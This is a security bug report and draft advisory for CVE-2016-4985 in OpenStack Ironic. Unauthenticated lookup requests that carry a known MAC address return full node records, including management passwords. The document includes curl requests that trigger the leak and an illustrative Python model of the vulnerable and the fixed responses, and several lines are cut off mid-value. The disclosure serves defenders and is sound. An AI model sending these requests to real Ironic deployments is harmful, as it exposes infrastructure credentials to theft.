Node information including credentials exposed to unauthenticated users (CVE-2016-4985)
Affects | Status | Importance | Assigned to | Milestone
---|---|---|---|---
Ironic | Fix Released | High | aeva black |
Bug Description
Environment:
- servers are Ubuntu Trusty 14.04.4 LTS
- ironic is deployed as part of an OpenStack cloud, configured to use keystone auth
- ironic is running current master (early Newton) + Neutron integration patches (should be completely unrelated)
- agent_ipmitool driver is enabled
Steps to reproduce:
- enable any of the "agent" class of drivers. For the examples below, let's assume that "agent_ipmitool" is enabled, but this works if any driver that includes the AgentVendorPassthru interface is loaded, even if the Node is not configured to use that driver.
- register a Node in Ironic with any driver
- register a Port in Ironic and associate it to that Node
- send an *unauthenticated* POST request to ${IRONIC_
Result:
- receive the complete Node record (an unauthenticated user should not be able to do that)
- bypass ironic API policy enforcement and retrieve the un-masked management credentials for the Node
- also receive the "heartbeat_timeout" value
Expected result:
- receive only the node UUID and heartbeat_timeout, because this should be all that the IPA ramdisk requires to continue operating
Example curl command:
curl -X POST -H 'X-OpenStack-
-d '{"version": "2", "inventory": { "interfaces": [ { "name": "", "mac_address": "aa:bb:cc:dd:ee:ff" } ] } }' \
https:/
Example result:
{
"heartbeat_
"node" : {
"
"raid_config" : {},
"
"id" : 2,
"
"reservation" : null,
"
"properties" : {
"cpu_arch" : "x86_64",
"cpus" : 8,
"local_gb" : 1116
},
"
"updated_at" : "2016-04-
"created_at" : "2016-04-
"driver" : "agent_ipmitool",
"
"name" : "my-test-system",
"
"driver_info" : {
},
"uuid" : "64d46f02-
"
"
"maintenance" : false,
"extra" : {},
"
"
"chassis_id" : null,
"power_state" : "power off",
"
"
"clean_step" : {},
"
"last_error" : null
}
}
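As an added illustration of the "Result" versus "Expected result" above (this is not Ironic's own code, and the lookup handler, sample Node, Port, driver_info keys and heartbeat value are all constructed for the example), the following model shows why the lookup response must be reduced to the node UUID and heartbeat_timeout: the full-record variant hands out driver_info without ever passing through the policy layer that masks passwords, while the minimal variant gives the ramdisk exactly what it needs and nothing else.

```python
from typing import Any, Dict, List, Optional

# Constructed sample data (not from a real deployment). The Node is shaped like
# the record in the bug report; driver_info holds the management credentials
# that policy.json is supposed to mask in ordinary API responses.
HEARTBEAT_TIMEOUT = 300  # assumed value; the report only shows the key name

NODES: Dict[int, Dict[str, Any]] = {
    2: {
        "id": 2,
        "uuid": "64d46f02-0000-4000-8000-000000000000",  # placeholder UUID
        "name": "my-test-system",
        "driver": "agent_ipmitool",
        "power_state": "power off",
        "maintenance": False,
        "properties": {"cpu_arch": "x86_64", "cpus": 8, "local_gb": 1116},
        "driver_info": {
            "ipmi_address": "192.0.2.10",        # constructed
            "ipmi_username": "admin",            # constructed
            "ipmi_password": "constructed-pw",   # constructed secret
        },
    }
}

# Ports map a MAC address to the Node that owns it; the MAC in the ramdisk
# inventory is the only thing the lookup call has to go on.
PORTS: List[Dict[str, Any]] = [{"address": "aa:bb:cc:dd:ee:ff", "node_id": 2}]

SENSITIVE_MARKERS = ("password", "passwd", "secret", "token", "private_key")


def node_for_inventory(inventory: Dict[str, Any], ports, nodes) -> Optional[Dict[str, Any]]:
    """Find the Node whose Port matches a MAC reported in the ramdisk inventory."""
    macs = {
        iface["mac_address"].lower()
        for iface in inventory.get("interfaces", [])
        if iface.get("mac_address")
    }
    for port in ports:
        if port["address"].lower() in macs:
            return nodes.get(port["node_id"])
    return None


def legacy_lookup(node: Dict[str, Any], heartbeat_timeout: int) -> Dict[str, Any]:
    """Behaviour described in the report: the entire Node record is returned.
    Nothing on this path applies the policy that masks driver_info secrets."""
    return {"heartbeat_timeout": heartbeat_timeout, "node": dict(node)}


def minimal_lookup(node: Dict[str, Any], heartbeat_timeout: int) -> Dict[str, Any]:
    """Expected behaviour: only the UUID and heartbeat_timeout, which is all
    the ramdisk needs to keep operating."""
    return {"heartbeat_timeout": heartbeat_timeout, "node": {"uuid": node["uuid"]}}


def handle_lookup(body: Dict[str, Any], minimal: bool = True) -> Optional[Dict[str, Any]]:
    """Model of the unauthenticated lookup endpoint. Returns None when no Port
    matches, so an unknown MAC reveals nothing about registered Nodes."""
    node = node_for_inventory(body.get("inventory", {}), PORTS, NODES)
    if node is None:
        return None
    build = minimal_lookup if minimal else legacy_lookup
    return build(node, HEARTBEAT_TIMEOUT)


def leaked_credential_keys(response: Dict[str, Any]) -> List[str]:
    """Audit helper: driver_info keys in a response whose names look like secrets."""
    driver_info = response.get("node", {}).get("driver_info", {})
    return sorted(
        key for key in driver_info
        if any(marker in key.lower() for marker in SENSITIVE_MARKERS)
    )


# Constructed request body, same shape as the curl example in the report.
SAMPLE_REQUEST = {
    "version": "2",
    "inventory": {"interfaces": [{"name": "", "mac_address": "AA:bb:cc:dd:ee:ff"}]},
}

if __name__ == "__main__":
    for minimal in (False, True):
        resp = handle_lookup(SAMPLE_REQUEST, minimal=minimal)
        print("minimal=%s node_keys=%s leaked=%s" % (
            minimal, sorted(resp["node"]), leaked_credential_keys(resp)))
```

Running the block prints the full key set and the leaked `ipmi_password` for the legacy form, and only `uuid` with nothing leaked for the minimal form; `leaked_credential_keys` is the kind of check worth keeping in a test suite so that a later change to the lookup response cannot silently reintroduce driver_info.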
CVE References
Changed in ironic:
status: New → Confirmed
importance: Undecided → High
assignee: nobody → Devananda van der Veen (devananda)
summary: Complete node information available to unauthenticated users, if they know MAC address of Node → Node information including credentials exposed to unauthenticated users (CVE-2016-4985)
Changed in ironic:
status: Confirmed → In Progress
Changed in ironic:
status: In Progress → Fix Committed
information type: Private Security → Public Security
DRAFT
-----
Title: Ironic Node information including credentials exposed to unauthenticated users
Reporter: Devananda van der Veen
Products: OpenStack Ironic
Affects: >=2014.2, >=4.0.0 <=5.1.1
Description:
Devananda van der Veen reported the following vulnerability in Ironic.
Anyone with network access to the ironic-api service can bypass Keystone authentication and retrieve all information about any Node registered with Ironic, if they know (or are able to guess) the MAC address of a network card belonging to that Node. The HTTP response will include the full Node details, including management passwords, even when /etc/ironic/policy.json is configured to hide passwords in API responses.
This can be done by sending a request such as the following:
curl -X POST -H "Content-Type: application/json" -d \
'{ "version": "2", "inventory": { "interfaces": [ { "mac_address": "$ADDRESS" } ] } }' \
http://$HOST:6385/v1/drivers/$DRIVER/vendor_passthru/lookup
This affects all instances of Ironic where the "enabled_drivers" setting includes any of the "agent" family of drivers (e.g., agent_ssh, agent_ipmitool, agent_ilo). In such an environment, all Nodes may be exposed, even Nodes that are configured with another driver, and even if no Nodes at all are configured to use any of the agent_* drivers.
This vulnerability has been verified in all currently supported branches (liberty, mitaka, master) and traced back to code introduced in commit 3e568fbbbcc5748035c1448a0bdb26306470797c during the Juno development cycle. Therefore, it is likely that both juno and kilo branches (and their releases) are also affected.